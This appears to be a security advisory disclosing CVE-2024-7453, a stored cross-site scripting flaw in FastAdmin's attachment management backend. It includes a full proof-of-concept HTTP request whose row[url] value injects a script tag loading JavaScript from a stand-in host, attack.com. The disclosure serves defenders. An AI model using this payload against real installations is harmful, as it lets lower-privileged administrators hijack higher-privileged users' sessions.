FastAdmin 1.5.0.20240328 Stored XSS Vulnerability

[Hebing123]

Summary

FastAdmin is a lightweight and efficient management background framework based on ThinkPHP. It is widely used for its simplicity and powerful features.

FastAdmin 1.5.0.20240328, a version of the FastAdmin framework, contains a stored cross-site scripting (XSS) vulnerability in the backend's General Management - Attachment Management section.

Details

Administrators with access to manage attachments (e.g., secondary administrators) can exploit this vulnerability to target users with higher privileges.

The vulnerability can be triggered by manipulating the row.url of the attachments.

Proof of Concept (POC)

POST /[admins' url].php/general/attachment/edit/ids/4?dialog=1 HTTP/1.1
Host: your-ip
Content-Length: 349
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: [Cookies omitted for brevity]
Connection: close

row%5Bcategory%5D=unclassed&row%5Burl%5D=%22%3E%3CsCRiPt%2FSrC%3D%2F%2Fattack.com/1.js%2FtndM%3E%2F%2F&row%5Bimagewidth%5D=1056&row%5Bimageheight%5D=626&row%5Bimagetype%5D=png&row%5Bimageframes%5D=0&row%5Bfilename%5D=test.png&row%5Bfilesize%5D=24535&row%5Bmimetype%5D=image%2Fpng&row%5Bextparam%5D=&row%5Buploadtime%5D=2024-08-01+15%3A00%3A40&row%5Bstorage%5D=local

[Hebing123]

CVE-2024-7453